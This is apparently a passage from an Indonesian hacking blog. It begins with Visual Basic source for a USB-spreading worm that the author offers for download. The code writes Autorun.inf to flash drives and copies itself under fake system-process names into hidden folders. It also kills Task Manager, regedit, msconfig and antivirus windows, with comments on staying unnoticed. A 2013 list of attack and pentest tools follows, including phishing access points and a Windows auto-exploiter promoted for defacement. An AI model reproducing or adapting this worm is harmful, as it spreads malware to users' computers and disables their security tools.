SetAttr FlashDisk & “\Winlogon.exe”, vbHidden + vbSystem + vbReadOnly
End If
BuatFileAutorunInf
End Sub
Sub BuatFileAutorunInf()
‘membuat file Autorun.inf ke flashdisk yang berfungsi agar setiap flashdisk jika di klik dua kali/klik kanan trus klik open maka Virus (winlogon.exe) akan tereksekusi
On Error Resume Next
Open FlashDisk & “\Autorun.Inf” For Output As 1
Print #1, “[AutoRun]”
Print #1, “Icon=Winlogon.exe” ‘Agar FlashDisk Memiliki Icon Sama dengan Virus
Print #1, “Open=Winlogon.exe”
Print #1, “ShellExecute=Winlogon.exe”
Print #1, “Shell\Open\Command=Winlogon.exe”
Print #1, “Shell=Open”
Close #1
SetAttr FlashDisk & “\Autorun.Inf”, vbHidden + vbSystem + vbReadOnly
End Sub
Sub GandakefolderIstimewa()
On Error Resume Next
Set RegRun = CreateObject(“WScript.Shell”)
FolderStartUp = RegRun.specialfolders(“StartUp”)
FolderMyDocuments = RegRun.specialfolders(“MyDocuments”)
FolderTemplates = RegRun.specialfolders(“Templates”)
FolderNetHood = RegRun.specialfolders(“NetHood”)
FolderPrintHood = RegRun.specialfolders(“PrintHood”)
FolderFavorites = RegRun.specialfolders(“Favorites”)
FolderSendTo = RegRun.specialfolders(“SendTo”)
FolderPrograms = RegRun.specialfolders(“Programs”)
On Error Resume Next
‘membuat virus dengan nama winlogon.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderStartUp & “\WinLogon.Exe”
SetAttr FolderStartUp & “\Winlogon.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama services.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderMyDocuments & “\services.Exe”
SetAttr FolderMyDocuments & “\services.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama smss.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderTemplates & “\smss.Exe”
SetAttr FolderTemplates & “\smss.Exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama csrss.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderPrintHood & “\csrss.Exe”
SetAttr FolderPrintHood & “\csrss.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama Isass.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderNetHood & “\Isass.Exe”
SetAttr FolderNetHood & “\Isass.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama SalamKenal.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderFavorites & “\SalamKenal.Exe”
SetAttr FolderFavorites & “\SalamKenal.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama System.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderSendTo & “\System.Exe”
SetAttr FolderSendTo & “\System.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama ctfmon.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderPrograms & “\ctfmon.Exe”
SetAttr FolderPrograms & “\ctfmon.exe”, vbHidden + vbSystem + vbReadOnly
End Sub
Private Sub Timer1_Timer() ‘Timer 1 diberi interval 5 detik
On Error Resume Next
FWnd = FindWindow(“OpusApp”, “Document1 – Microsoft Word”) ‘Ms Word
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatWord
obj.Visible = True
Timer2.Enabled = True
Timer1.Enabled = False
End If
On Error Resume Next
FWnd = FindWindow(“OpusApp”, “New Microsoft Word Document.doc – Microsoft Word”) ‘Ms Word
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatWord
obj.Visible = True
Timer2.Enabled = True
Timer1.Enabled = False
End If
End Sub
Private Sub Timer2_Timer()
On Error Resume Next
FWnd = FindWindow(“XLMAIN”, “Microsoft Excel – Book1″) ‘ms excel
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatXls
obj.Visible = True
Timer1.Enabled = True
Timer2.Enabled = False
End If
On Error Resume Next
FWnd = FindWindow(“XLMAIN”, “Microsoft Excel – New Microsoft Excel Worksheet.xls”) ‘ms excel
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatXls
obj.Visible = True
Timer1.Enabled = True
Timer2.Enabled = False
End If
End Sub
Private Sub Timer3_Timer()
On Error Resume Next
‘menutup aplikasi yang berbahaya bagi virus
FWnd = FindWindow(“#32770″, “RUN”) ‘jendela run
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“#32770″, “System Configuration Utility”) ‘msconfig
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“#32770″, “Windows Task Manager”) ‘task manager
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“#32770″, “Avira AntiVir Personal – Free Antivirus”) ‘Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“#32770″, “AntiVir Guard: Attention, Detection!”) ‘Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“RegEdit_RegEdit”, vbNullString) ‘regedit.exe
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“TMainForm”, vbNullString) ‘aplikasi buatan Delphi (Antivirus PCMAV yang versi lama dapat ditutup tetapi versi yang baru tidak bisa dihentikan) <:d
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“TApplication”, vbNullString) ‘aplikasi buatan Delphi
SendMessage FWnd, WM_CLOSE, 0&, 0&
End Sub
Private Sub Timer4_Timer()
‘cari flashdisk
On Error Resume Next
For i = 0 To Drive1.ListCount – 1
If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1) <> “a” Then
FlashDisk = (Drive1.List(i))
Timer4.Enabled = False ‘agar lampu flashdisk tdk berkedip-kedip terlalu lama, sehingga tdk mencurigakan si empunya flashdisk
Exit For
End If
Next
GandaKeFlashDisk ‘
End Sub
Private Sub Timer5_Timer()
On Error Resume Next
InfeksiRegistry
‘Mungkin salah satu virus dihapus shg perlu selalu menggandakan diri
GandakefolderIstimewa
‘menyalakan timer 4
If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1) <> “a” Then
Timer4.Enabled = True
End If
End Sub
Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
Cancel = 1
End Sub
Private Sub Form_Unload(Cancel As Integer)
Cancel = 1
End Sub
Silahkan Download Project Di Download/Upload Gratis Join 4Shared Now!, Tetapi sebelumnya jika anda berkenan berikan rating pada artikel ini dengan mengklik tanda bintang di bawah ini, agar saya mengetahui artikel yang paling menarik untuk penulisan selanjutnya. Terimakasih.
BY: HENDRA HACKER

Jumat, 19 April 2013

Tools Hacking - cracking 2013

Berikut ini adalah Tools Hacking Cracking Tools Cracker P2013 Security Tools Password Hack

1. PWN STAR

Sebuah script bash untuk meluncurkan AP , dapat dikonfigurasi dengan berbagai macam pilihan serangan. Termasuk sejumlah script index.html dan server php, untuk phishing. Dapat bertindak sebagai multi-klien captive portal menggunakan php dan iptables. Eksploitasi klasik seperti kejahatan-PDF, De-auth dengan aireplay, dll.
PwnStar BinusHacker
Fitur Umum:
  1. Mengelola Antarmuka dan MAC Spoofing
  2. Mengatur sniffing
  3. Web phishing
  4. Karmetasploit
  5. WPA handshake
  6. De-auth klien
  7. Mengelola Iptables
Download PwnStar Disini:

2. ZED Attack Proxy (ZAP)

(ZAP) adalah alat penetrasi pengujian terpadu untuk menemukan kerentanan dalam aplikasi web. Tools ini dirancang untuk digunakan oleh orang-orang dengan berbagai pengalaman security dan dengan demikian sangat ideal untuk para pengembang dan penguji fungsional yang baru untuk penetration testing serta menjadi tambahan yang berguna untuk toolbox tester.
ZAP - Zen Attack Proxy 2013
Fitur Utama:
  1. Intercepting Proxy
  2. Active scanner
  3. Passive scanner
  4. Brute Force scanner
  5. Spider
  6. Fuzzer
  7. Port Scanner
  8. Dynamic SSL certificates
  9. API
  10. Beanshell integration
Download ZAP Disini:

3. ETTERCAP

Ettercap adalah sniffer multiguna / interceptor / logger untuk Local Area Network. Mendukung diseksi aktif dan pasif dari banyak protokol (bahkan yang dalam bentuk kode) dan mencakup banyak fitur untuk analisis jaringan dan host.
Ettercap - BinusHacker
Ettercap - BinusHacker
Fungsi Umum:
  1. Untuk melakukan capture traffic dan data
  2. Untuk melakukan logging network
  3. Dll
Download Ettercap Disini:

4. SANS Investigative Forensic Toolkit (SIFT)

The SANS Investigative Forensic Toolkit (SIFT) Workstation adalah VMware Appliance yang bisa di konfigurasi dengan semua kebutuhan untuk melakukan digital forensik secara mendetail. Kompatible dengan Expert Witness Format (E01), Advanced Forensic Format (AFF), and raw (dd) evidence formats. Versi baru telah sepenuhnya dibangun kembali pada basis Ubuntu dengan banyak tools tambahan dan kemampuan yang digunakan dalam teknologi modern forensik.SANS+Investigative+Forensic+Toolkit+2.14+Released
Fungsi Umum SIFT:
  1. iPhone, Blackberry, and Android Forensic Capabilities
  2. Registry Viewer (YARU)
  3. Compatibility with F-Response Tactical, Standard, and Enterprise
  4. PTK 2.0 (Special Release – Not Available for Download)
  5. Automated Timeline Generation via log2timeline
  6. Many Firefox Investigative Plugins
  7. Windows Journal Parser and Shellbags Parser (jp and sbag)
  8. Many Windows Analysis Utilities (prefetch, usbstor, event log, and more)
  9. Complete Overhaul of Regripper Plugins (added over 80 additional plugins)
Download SANS Investigative Forensic Toolkit (SIFT) Disini:

5. WIRESHARK

Wireshark adalah alat yang paling banyak digunakan dan paling populer pada dunia analyzer protokol, dan merupakan standar de facto di banyak industri dan lembaga pendidikan untuk menganalisa jaringan di berbagai protokol.
Wire Shark - 2013 - BinusHacker
Fungsi Umum:
  1. Live capture and offline analysis
  2. Standard three-pane packet browser
  3. Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
  4. Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility
  5. The most powerful display filters in the industry
  6. Rich VoIP analysis
  7. Read/write many different capture file formats
  8. Dll
Download WireShark Disini:

6. WEBSPLOIT

WebSploit adalah Open Source Project untuk Scan dan Analysis Remote System dari kelemahan-kelemahan pada aplikasi website.
WebSploit+Framework+2.0.3+with+Wifi+Jammer
Fitur Utama:
[>]Social Engineering Works
[>]Scan,Crawler & Analysis Web
[>]Automatic Exploiter
[>]Support Network Attacks
—-
[+]Autopwn – Used From Metasploit For Scan and Exploit Target Service
[+]wmap – Scan,Crawler Target Used From Metasploit wmap plugin
[+]format infector – inject reverse & bind payload into file format
[+]phpmyadmin Scanner
[+]LFI Bypasser
[+]Apache Users Scanner
[+]Dir Bruter
[+]admin finder
[+]MLITM Attack – Man Left In The Middle, XSS Phishing Attacks
[+]MITM – Man In The Middle Attack
[+]Java Applet Attack
[+]MFOD Attack Vector
[+]USB Infection Attack
[+]ARP Dos Attack
[+]Web Killer Attack
[+]Fake Update Attack
[+]Fake Access point Attack
Download WebSploit Framework Disini:

7. WINAUTOPWN

WinAutoPWN merupakan sebuah tools yang digunakan untuk mengexploitasi secara langsung Windows Framework, sehingga secara otomatis kita yang akan menjadi administrator di windows tersebut. Banyak digunakan oleh “Defacer” Indonesia untuk melakukan deface terhadap Windows Server :)
WinAutoPWN 2013 - BinusHacker
Download WinAutoPWN Disini:

8. HASHCAT

Hashcat adalah sebuah tools untuk crack berbagai password yang di encrypt, sangat powerfull untuk recovery password.
Hashcat 2013 - BinusHacker
Fungsi Umum:
  1. Multi-Threaded
  2. Free
  3. Multi-Hash (up to 24 million hashes)
  4. Multi-OS (Linux, Windows and OSX native binaries)
  5. Multi-Algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, …)
  6. SSE2 accelerated
  7. All Attack-Modes except Brute-Force and Permutation can be extended by rules
  8. Very fast Rule-engine
  9. Rules compatible with JTR and PasswordsPro
  10. Possible to resume or limit session
  11. Automatically recognizes recovered hashes from outfile at startup
  12. Can automatically generate random rules
  13. Load saltlist from external file and then use them in a Brute-Force Attack variant
  14. Able to work in an distributed environment
  15. Specify multiple wordlists or multiple directories of wordlists
  16. Number of threads can be configured
  17. Threads run on lowest priority
  18. 30+ Algorithms implemented with performance in mind
  19. and much more
Download HashCat Disini:

9. UNISCAN

Uniscan adalah scanner untuk aplikasi web, yang ditulis dalam perl untuk Linux. Saat ini versi Uniscan adalah 6,2.
uniscan
Fungsi Umum:
  1. Identification of system pages through a Web Crawler.
  2. Use of threads in the crawler.
  3. Control the maximum number of requests the crawler.
  4. Control of variation of system pages identified by Web Crawler.
  5. Control of file extensions that are ignored.
  6. Test of pages found via the GET method.
  7. Test the forms found via the POST method.
  8. Support for SSL requests (HTTPS).
  9. Proxy support.
  10. Generate site list using Google.
  11. Generate site list using Bing.
  12. Plug-in support for Crawler.
  13. Plug-in support for dynamic tests.
  14. Plug-in support for static tests.
  15. Plug-in support for stress tests.
  16. Multi-language support.
  17. Web client.
Download Uniscan Disini:
 

10. SAMURAI WEB TESTING FRAMEWORK (SWTF)

SWTF ini digunakan untuk melakukan pengujian / pentest terhadap web application, digunakan untuk menemukan kelemahan dan melakukan exploitasi terhadap web tersebut. Sangat komplit dan banyak digunakan didunia termasuk digunakan oleh salah satu staff binushacker :)
Samurai Web Pentest 2013 - BinusHacker
Fungsi Umum:
  1. Web Scanner
  2. Web Mapping
  3. Web Exploitation
Download The Samurai Web Testing Framework Disini:
 

Semoga bermanfaat artikel yang saya tulis di atas dan
selalu kunjungi www.hackerdns.blogspot.com
BY : HENDRA HACKER 

Pencarian

Statistik

 
Copyright© 2011 Hacker Dns | Template Blogger Designer by : Alan' |
Template Name | Uniqx Transparent : Version 1.0 | Open new Daily